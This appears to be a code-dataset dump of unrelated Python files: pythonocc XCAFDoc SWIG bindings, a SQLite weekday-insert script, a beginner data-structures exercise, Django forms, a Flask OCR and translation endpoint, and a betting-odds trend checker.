:type NextUsageL: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUOUpperUsage(*args)
GetSHUOUpperUsage = staticmethod(GetSHUOUpperUsage)
def GetSHUONextUsage(*args):
"""
* Returns the sequence of labels of SHUO attributes, which is next_usage for this upper_usage SHUO attribute (that indicated by label) NOTE: returns next_usages only on one level (not recurse) NOTE: do not clear the sequence before filling
:param UpperUsageL:
:type UpperUsageL: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUONextUsage(*args)
GetSHUONextUsage = staticmethod(GetSHUONextUsage)
def RemoveSHUO(self, *args):
"""
* Remove SHUO from component sublabel, remove all dependencies on other SHUO. Returns False if cannot remove SHUO dependencies. NOTE: remove any styles that associated with this SHUO.
:param SHUOLabel:
:type SHUOLabel: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_RemoveSHUO(self, *args)
def FindComponent(self, *args):
"""
* Serach the path of labels in the document, that corresponds the component from any assembly Try to search the sequence of labels with location that produce this shape as component of any assembly NOTE: Clear sequence of labels before filling
:param theShape:
:type theShape: TopoDS_Shape &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindComponent(self, *args)
def GetSHUOInstance(self, *args):
"""
* Search for the component shape that styled by shuo Returns null shape if no any shape is found.
:param theSHUO:
:type theSHUO: Handle_XCAFDoc_GraphNode &
:rtype: TopoDS_Shape
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUOInstance(self, *args)
def SetInstanceSHUO(self, *args):
"""
* Search for the component shape by labelks path and set SHUO structure for founded label structure Returns null attribute if no component in any assembly found.
:param theShape:
:type theShape: TopoDS_Shape &
:rtype: Handle_XCAFDoc_GraphNode
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetInstanceSHUO(self, *args)
def GetAllSHUOInstances(self, *args):
"""
* Seaching for component shapes that styled by shuo Returns empty sequence of shape if no any shape is found.
:param theSHUO:
:type theSHUO: Handle_XCAFDoc_GraphNode &
:param theSHUOShapeSeq:
:type theSHUOShapeSeq: TopTools_SequenceOfShape &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetAllSHUOInstances(self, *args)
def FindSHUO(*args):
"""
* Searchs the SHUO by labels of components from upper_usage componet to next_usage Returns null attribute if no SHUO found
:param Labels:
:type Labels: TDF_LabelSequence &
:param theSHUOAttr:
:type theSHUOAttr: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindSHUO(*args)
FindSHUO = staticmethod(FindSHUO)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_ShapeTool self)"""
return _XCAFDoc.XCAFDoc_ShapeTool__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_ShapeTool self) -> Handle_XCAFDoc_ShapeTool"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_ShapeTool.IsTopLevel = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_IsTopLevel,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.IsSubShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_IsSubShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.SearchUsingMap = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_SearchUsingMap,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.Search = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_Search,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.FindShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_FindShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.NewShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_NewShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.SetShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_SetShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.AddShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_AddShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.RemoveShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_RemoveShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.Init = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_Init,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.ComputeShapes = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_ComputeShapes,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.ComputeSimpleShapes = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_ComputeSimpleShapes,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.GetShapes = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_GetShapes,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.GetFreeShapes = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_GetFreeShapes,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.AddComponent = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_AddComponent,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.RemoveComponent = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_RemoveComponent,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.UpdateAssembly = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_UpdateAssembly,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.FindSubShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_FindSubShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.AddSubShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_AddSubShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.FindMainShapeUsingMap = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_FindMainShapeUsingMap,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.FindMainShape = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_FindMainShape,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.BaseLabel = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_BaseLabel,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.Dump = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_Dump,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.SetExternRefs = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_SetExternRefs,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.SetSHUO = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_SetSHUO,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.RemoveSHUO = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_RemoveSHUO,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.FindComponent = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_FindComponent,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.GetSHUOInstance = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_GetSHUOInstance,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.SetInstanceSHUO = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_SetInstanceSHUO,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.GetAllSHUOInstances = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_GetAllSHUOInstances,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool__kill_pointed,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_ShapeTool_GetHandle,None,XCAFDoc_ShapeTool)
XCAFDoc_ShapeTool_swigregister = _XCAFDoc.XCAFDoc_ShapeTool_swigregister
XCAFDoc_ShapeTool_swigregister(XCAFDoc_ShapeTool)
def XCAFDoc_ShapeTool_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetID(*args)
def XCAFDoc_ShapeTool_Set(*args):
"""
* Create (if not exist) ShapeTool from XCAFDoc on <L>.
:param L:
:type L: TDF_Label &
:rtype: Handle_XCAFDoc_ShapeTool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_Set(*args)
def XCAFDoc_ShapeTool_IsFree(*args):
"""
* Returns True if the label is not used by any assembly, i.e. contains sublabels which are assembly components This is relevant only if IsShape() is True (There is no Father TreeNode on this <L>)
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsFree(*args)
def XCAFDoc_ShapeTool_IsShape(*args):
"""
* Returns True if the label represents a shape (simple shape, assembly or reference)
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsShape(*args)
def XCAFDoc_ShapeTool_IsSimpleShape(*args):
"""
* Returns True if the label is a label of simple shape
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsSimpleShape(*args)
def XCAFDoc_ShapeTool_IsReference(*args):
"""
* Return true if <L> is a located instance of other shape i.e. reference
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsReference(*args)
def XCAFDoc_ShapeTool_IsAssembly(*args):
"""
* Returns True if the label is a label of assembly, i.e. contains sublabels which are assembly components This is relevant only if IsShape() is True
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsAssembly(*args)
def XCAFDoc_ShapeTool_IsComponent(*args):
"""
* Return true if <L> is reference serving as component of assembly
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsComponent(*args)
def XCAFDoc_ShapeTool_IsCompound(*args):
"""
* Returns True if the label is a label of compound, i.e. contains some sublabels This is relevant only if IsShape() is True
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsCompound(*args)
def XCAFDoc_ShapeTool_GetShape(*args):
"""
* To get TopoDS_Shape from shape's label For component, returns new shape with correct location Returns False if label does not contain shape
:param L:
:type L: TDF_Label &
:param S:
:type S: TopoDS_Shape &
:rtype: bool
* To get TopoDS_Shape from shape's label For component, returns new shape with correct location Returns Null shape if label does not contain shape
:param L:
:type L: TDF_Label &
:rtype: TopoDS_Shape
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetShape(*args)
def XCAFDoc_ShapeTool_SetAutoNaming(*args):
"""
* Sets auto-naming mode to <V>. If True then for added shapes, links, assemblies and SHUO's, the TDataStd_Name attribute is automatically added. For shapes it contains a shape type (e.g. 'SOLID', 'SHELL', etc); for links it has a form '=>[0:1:1:2]' (where a tag is a label containing a shape without a location); for assemblies it is 'ASSEMBLY', and 'SHUO' for SHUO's. This setting is global; it cannot be made a member function as it is used by static methods as well. By default, auto-naming is enabled. See also AutoNaming().
:param V:
:type V: bool
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_SetAutoNaming(*args)
def XCAFDoc_ShapeTool_AutoNaming(*args):
"""
* Returns current auto-naming mode. See SetAutoNaming() for description.
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_AutoNaming(*args)
def XCAFDoc_ShapeTool_GetUsers(*args):
"""
* Returns list of labels which refer shape L as component Returns number of users (0 if shape is free)
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: int
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetUsers(*args)
def XCAFDoc_ShapeTool_GetLocation(*args):
"""
* Returns location of instance
:param L:
:type L: TDF_Label &
:rtype: TopLoc_Location
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetLocation(*args)
def XCAFDoc_ShapeTool_GetReferredShape(*args):
"""
* Returns label which corresponds to a shape referred by L Returns False if label is not reference
:param L:
:type L: TDF_Label &
:param Label:
:type Label: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetReferredShape(*args)
def XCAFDoc_ShapeTool_NbComponents(*args):
"""
* Returns number of Assembles components
:param L:
:type L: TDF_Label &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: int
"""
return _XCAFDoc.XCAFDoc_ShapeTool_NbComponents(*args)
def XCAFDoc_ShapeTool_GetComponents(*args):
"""
* Returns list of components of assembly Returns False if label is not assembly
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:param getsubchilds: default value is Standard_False
:type getsubchilds: bool
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetComponents(*args)
def XCAFDoc_ShapeTool_GetSubShapes(*args):
"""
* Returns list of labels identifying subshapes of the given shape Returns False if no subshapes are placed on that label
:param L:
:type L: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSubShapes(*args)
def XCAFDoc_ShapeTool_DumpShape(*args):
"""
* Print in cout type of shape found on <L> label and the entry of <L>, with <level> tabs before. If <deep>, print also TShape and Location addresses
:param L:
:type L: TDF_Label &
:param level: default value is 0
:type level: int
:param deep: default value is Standard_False
:type deep: bool
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_DumpShape(*args)
def XCAFDoc_ShapeTool_IsExternRef(*args):
"""
* Returns True if the label is a label of external references, i.e. there are some reference on the no-step files, which are described in document only their names
:param L:
:type L: TDF_Label &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_IsExternRef(*args)
def XCAFDoc_ShapeTool_GetExternRefs(*args):
"""
* Gets the names of references on the no-step files
:param L:
:type L: TDF_Label &
:param SHAS:
:type SHAS: TColStd_SequenceOfHAsciiString &
:rtype: void
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetExternRefs(*args)
def XCAFDoc_ShapeTool_GetSHUO(*args):
"""
* Returns founded SHUO GraphNode attribute <aSHUOAttr> Returns false in other case
:param SHUOLabel:
:type SHUOLabel: TDF_Label &
:param aSHUOAttr:
:type aSHUOAttr: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUO(*args)
def XCAFDoc_ShapeTool_GetAllComponentSHUO(*args):
"""
* Returns founded SHUO GraphNodes of indicated component Returns false in other case
:param CompLabel:
:type CompLabel: TDF_Label &
:param SHUOAttrs:
:type SHUOAttrs: TDF_AttributeSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetAllComponentSHUO(*args)
def XCAFDoc_ShapeTool_GetSHUOUpperUsage(*args):
"""
* Returns the sequence of labels of SHUO attributes, which is upper_usage for this next_usage SHUO attribute (that indicated by label) NOTE: returns upper_usages only on one level (not recurse) NOTE: do not clear the sequence before filling
:param NextUsageL:
:type NextUsageL: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUOUpperUsage(*args)
def XCAFDoc_ShapeTool_GetSHUONextUsage(*args):
"""
* Returns the sequence of labels of SHUO attributes, which is next_usage for this upper_usage SHUO attribute (that indicated by label) NOTE: returns next_usages only on one level (not recurse) NOTE: do not clear the sequence before filling
:param UpperUsageL:
:type UpperUsageL: TDF_Label &
:param Labels:
:type Labels: TDF_LabelSequence &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_GetSHUONextUsage(*args)
def XCAFDoc_ShapeTool_FindSHUO(*args):
"""
* Searchs the SHUO by labels of components from upper_usage componet to next_usage Returns null attribute if no SHUO found
:param Labels:
:type Labels: TDF_LabelSequence &
:param theSHUOAttr:
:type theSHUOAttr: Handle_XCAFDoc_GraphNode &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_ShapeTool_FindSHUO(*args)
class Handle_XCAFDoc_ShapeTool(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_ShapeTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_ShapeTool(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_ShapeTool_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_ShapeTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeTool_Nullify,None,Handle_XCAFDoc_ShapeTool)
Handle_XCAFDoc_ShapeTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeTool_IsNull,None,Handle_XCAFDoc_ShapeTool)
Handle_XCAFDoc_ShapeTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeTool_GetObject,None,Handle_XCAFDoc_ShapeTool)
Handle_XCAFDoc_ShapeTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_ShapeTool__kill_pointed,None,Handle_XCAFDoc_ShapeTool)
Handle_XCAFDoc_ShapeTool_swigregister = _XCAFDoc.Handle_XCAFDoc_ShapeTool_swigregister
Handle_XCAFDoc_ShapeTool_swigregister(Handle_XCAFDoc_ShapeTool)
def Handle_XCAFDoc_ShapeTool_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_ShapeTool_DownCast(*args)
Handle_XCAFDoc_ShapeTool_DownCast = _XCAFDoc.Handle_XCAFDoc_ShapeTool_DownCast
class XCAFDoc_Volume(OCC.TDF.TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
* class methods =============
:rtype: None
"""
_XCAFDoc.XCAFDoc_Volume_swiginit(self,_XCAFDoc.new_XCAFDoc_Volume(*args))
def GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Volume_GetID(*args)
GetID = staticmethod(GetID)
def Set(*args):
"""
* Sets a value of volume
:param vol:
:type vol: float
:rtype: None
* Find, or create, an Volume attribute and set its value
:param label:
:type label: TDF_Label &
:param vol:
:type vol: float
:rtype: Handle_XCAFDoc_Volume
"""
return _XCAFDoc.XCAFDoc_Volume_Set(*args)
Set = staticmethod(Set)
def Get(*args):
"""
:rtype: float
* Returns volume as argument returns false if no such attribute at the <label>
:param label:
:type label: TDF_Label &
:param vol:
:type vol: float &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_Volume_Get(*args)
Get = staticmethod(Get)
def DumpToString(self):
"""DumpToString(XCAFDoc_Volume self) -> std::string"""
return _XCAFDoc.XCAFDoc_Volume_DumpToString(self)
def _kill_pointed(self):
"""_kill_pointed(XCAFDoc_Volume self)"""
return _XCAFDoc.XCAFDoc_Volume__kill_pointed(self)
def GetHandle(self):
"""GetHandle(XCAFDoc_Volume self) -> Handle_XCAFDoc_Volume"""
return _XCAFDoc.XCAFDoc_Volume_GetHandle(self)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
XCAFDoc_Volume.DumpToString = new_instancemethod(_XCAFDoc.XCAFDoc_Volume_DumpToString,None,XCAFDoc_Volume)
XCAFDoc_Volume._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Volume__kill_pointed,None,XCAFDoc_Volume)
XCAFDoc_Volume.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Volume_GetHandle,None,XCAFDoc_Volume)
XCAFDoc_Volume_swigregister = _XCAFDoc.XCAFDoc_Volume_swigregister
XCAFDoc_Volume_swigregister(XCAFDoc_Volume)
def XCAFDoc_Volume_GetID(*args):
"""
:rtype: Standard_GUID
"""
return _XCAFDoc.XCAFDoc_Volume_GetID(*args)
def XCAFDoc_Volume_Set(*args):
"""
* Sets a value of volume
:param vol:
:type vol: float
:rtype: None
* Find, or create, an Volume attribute and set its value
:param label:
:type label: TDF_Label &
:param vol:
:type vol: float
:rtype: Handle_XCAFDoc_Volume
"""
return _XCAFDoc.XCAFDoc_Volume_Set(*args)
def XCAFDoc_Volume_Get(*args):
"""
:rtype: float
* Returns volume as argument returns false if no such attribute at the <label>
:param label:
:type label: TDF_Label &
:param vol:
:type vol: float &
:rtype: bool
"""
return _XCAFDoc.XCAFDoc_Volume_Get(*args)
class Handle_XCAFDoc_Volume(OCC.TDF.Handle_TDF_Attribute):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
_XCAFDoc.Handle_XCAFDoc_Volume_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Volume(*args))
DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Volume_DownCast)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
Handle_XCAFDoc_Volume.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Volume_Nullify,None,Handle_XCAFDoc_Volume)
Handle_XCAFDoc_Volume.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Volume_IsNull,None,Handle_XCAFDoc_Volume)
Handle_XCAFDoc_Volume.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Volume_GetObject,None,Handle_XCAFDoc_Volume)
Handle_XCAFDoc_Volume._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Volume__kill_pointed,None,Handle_XCAFDoc_Volume)
Handle_XCAFDoc_Volume_swigregister = _XCAFDoc.Handle_XCAFDoc_Volume_swigregister
Handle_XCAFDoc_Volume_swigregister(Handle_XCAFDoc_Volume)
def Handle_XCAFDoc_Volume_DownCast(*args):
return _XCAFDoc.Handle_XCAFDoc_Volume_DownCast(*args)
Handle_XCAFDoc_Volume_DownCast = _XCAFDoc.Handle_XCAFDoc_Volume_DownCast
|
23,529 | fbde2a7eacab32577227b831f400bb25ae9ac93c | # -*- coding: utf-8 -*-
"""
Created on Tue Aug 27 15:05:40 2019
@author: lenovo
"""
from sql.connect import DBConnection
day_id = [1,2,3,4,5,6,7]
day_kanji = ['日','月','火','水','木','金','土']
day_english = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']
db = DBConnection()
conn = db.connection()
c = conn.cursor()
#for i in range(len(morning_cat_id)):
# c.execute("insert into categories (category_id, category_name, version) values(?, ?, ?)", (morning_cat_id[i], morning_categories[i], 'M'))
# conn.commit()
#conn.close()
for i in range(len(day_id)):
c.execute("insert into days (day_id, day_kanji, day_english) values(?, ?, ?)", (day_id[i], day_kanji[i], day_english[i]))
conn.commit()
conn.close() |
23,530 | 8c84eac903cbbf9837fcf0c74e906a94f1cd61a9 | sum = 2 + 2
print(sum)
#List
my_list = ["renee", "leo", "clive", False, 41]
my_list.count("renee")
my_list.count(41)
my_list.append("tucker")
print(my_list)
my_list.count(41)
my_list.pop(2)
my_list.reverse()
print(my_list)
my_list.insert(1, 58)
print(my_list)
print(my_list)
my_list.insert(2, 58)
print(my_list)
my_new_list = list(["what"])
my_new_list = list("what")
print(my_list)
# Dictionary
my_pairs = {
"name": "Fred",
"age": 46
}
print(my_pairs)
name = my_pairs["name"]
print(name)
my_pairs["last"] = "Jones"
print("Line 35", my_pairs)
my_pairs["address"] = {"street": "123 Sesame Street", "zip": 40503}
print("Line 37", my_pairs)
print("Line 38", my_pairs["address"]["zip"])
print("Line 39 items", my_pairs.items())
print("Line 40 values", my_pairs.values())
for foo in my_pairs.values():
print("Line 43", foo)
for foo in my_pairs.items():
print("Line 46", foo)
for key,value in my_pairs.items():
print(f"This came from my_pairs: {value}")
print(f'Hello, my name is {my_pairs["name"]}')
# Sets
my_set = {"fred", 3, 12, True, "Jones", 3}
print("Line 56 set", my_set)
my_dupes = [1,2,3,4,5,1]
my_dupes = set(my_dupes)
print("Line 60", list(my_dupes))
my_set.add("hello C33")
print("Line 63", my_set)
print("Line 64", set(my_pairs))
# Tuples
my_tup = ("1", 1, 3, "hello", True, 3)
print("Line 69", my_tup)
my_tup.count(3)
print(my_tup.count(3))
print(my_tup.index("hello"))
# Conditionals
name = "Steve"
if name == "Steve":
print("I feel good")
elif name == "Joe":
print("Joe is the king of the world")
else:
print("I have a cold")
SUFFIXES = {1000: ['KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB'],
1024: ['KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB']}
def approximate_size(size, a_kilobyte_is_1024_bytes=True):
# '''Convert a file size to human-readable form.
# (this is a docstring)
# Keyword arguments:
# size -- file size in bytes
# a_kilobyte_is_1024_bytes -- if True (default), use multiples of 1024
# if False, use multiples of 1000
# Returns: string
# '''
if size < 0:
raise ValueError('number must be non-negative')
multiple = 1024 if a_kilobyte_is_1024_bytes else 1000
for suffix in SUFFIXES[multiple]:
size /= multiple
if size < multiple:
return '{0:.1f} {1}'.format(size, suffix)
raise ValueError('number too large')
if __name__ == '__main__':
print("Line 114", approximate_size(16384, False))
print("Line 115", approximate_size(size=16384, a_kilobyte_is_1024_bytes=False))
print("Line 116", approximate_size(-16384))
|
23,531 | 77f27b90f388b0de6ce5b930510c69c7ab485ee2 | from django import forms
from .models import UserRegistration
class UserRegistrationForm(forms.ModelForm):
class Meta:
model = UserRegistration
fields = '__all__'
class LoginForm(forms.Form):
username = forms.CharField(max_length=30)
password = forms.CharField(max_length=30)
class ViewDatadbForm(forms.Form):
select_choices =(('TCS','TCS'),
('INFOSYS','INFOSYS'),
('AMAZON','AMAZON'),
('FLIPKART','FLIPKART'),
)
companyname = forms.ChoiceField(choices = select_choices)
'''select_choices1 =(('1Year','1Year'),
('2Year','2Year'),
)
companysales = forms.ChoiceField(choices = select_choices1)'''
|
23,532 | 2dbd80c3a9b564446f6c1a0ae648cacec32c83be | from flask import Flask, request
import base64
from googletrans import Translator
import main
try:
from PIL import Image
except ImportError:
import Image
import pytesseract
app = Flask(__name__)
translator = Translator()
def to_english(text):
return translator.translate(text, dest="en").text
@app.route("/", methods=["POST"])
def get_data():
image = request.form["image"].encode("utf-8")
IMAGE = "image"
with open("image.png", "wb") as fh:
fh.write(base64.decodebytes(image))
stringed_image = to_english(pytesseract.image_to_string("image.png"))
print(stringed_image)
return stringed_image
@app.route("/summary", methods=["POST"])
def get_summary():
sents = request.form["count"]
string = request.form["content"]
res = main.main(string, int(sents))
return res
if __name__ == "__main__":
app.run("0.0.0.0", 5000, debug=True)
|
23,533 | c6e750a77fe02305c2db81277b91b3fb5cc4ea1c | import time
def to_timestamp(time_str):
return time.mktime(time.strptime(time_str, "%Y-%m-%d %H:%M"))
def is_decreasing(scores_odds):
ts_score = {}
for item in scores_odds:
if item[4]: # is_purple
continue
timestamp = to_timestamp(item[0])
score = item[1]
ts_score[timestamp] = score
ts_array = ts_score.keys()
ts_array.sort()
prev_score = 500
for ts in ts_array:
if prev_score < ts_score[ts]:
return False, 0
prev_score = ts_score[ts]
return True, prev_score
# <time, total score, odd_1, odd_2, is_purple>
# 2018-02-01 07:05
def test_is_decreasing(a):
result, score = is_decreasing(a)
print " result " + str(result)
print " score " + str(score)
# false
a1 = [
["2018-02-01 07:05", 100, 1, 1, False],
["2018-02-01 06:05", 99, 1, 1, False],
["2018-02-01 07:06", 99, 1, 1, False],
["2018-02-02 07:06", 98, 1, 1, False]]
# test_is_decreasing(a1)
# true
a2 = [
["2018-02-01 07:05", 100, 1, 1, False],
["2018-02-01 06:05", 99, 1, 1, True],
["2018-02-01 07:06", 99, 1, 1, False],
["2018-02-02 07:06", 98, 1, 1, False]]
# test_is_decreasing(a1)
# false
a3 = [
["2018-04-01 07:05", 100, 1, 1, False],
["2018-02-01 06:05", 99, 1, 1, True],
["2018-02-03 06:06", 101, 1, 1, False],
["2018-02-02 05:06", 102, 1, 1, False]]
# test_is_decreasing(a1)
def is_decreasing_type_2(scores_odds, allow_inc = 3):
ts_score = {}
for item in scores_odds:
if item[4]: # is_purple
continue
timestamp = to_timestamp(item[0])
score = item[1]
ts_score[timestamp] = score
ts_array = ts_score.keys()
ts_array.sort()
prev_score = 500
inc = 0
max_score = 0
min_score = prev_score
for ts in ts_array:
if prev_score < ts_score[ts]:
inc = inc + 1
prev_score = ts_score[ts]
if prev_score > max_score:
max_score = prev_score
if prev_score < min_score:
min_score = prev_score
print " inc " + str(inc)
first_ts = ts_array[0]
last_ts = ts_array[len(ts_array) - 1]
if min_score == ts_score[last_ts] and max_score == ts_score[first_ts]:
if inc > allow_inc:
return False, 0
return True, prev_score
return False, 0
def test_is_decreasing_2(a):
result, score = is_decreasing_type_2(a)
print " result " + str(result)
print " score " + str(score)
test_is_decreasing_2(a1)
test_is_decreasing_2(a2)
test_is_decreasing_2(a3) |
23,534 | 9748e7631a229c01d1d50fd3c03e2e1010ca60a9 | def LiqO2_px_N2(P,T,x_N2):
x = (P-5.56999512e+02)/3.71707300e-01
y = (T--1.76911493e+02)/6.36114000e-02
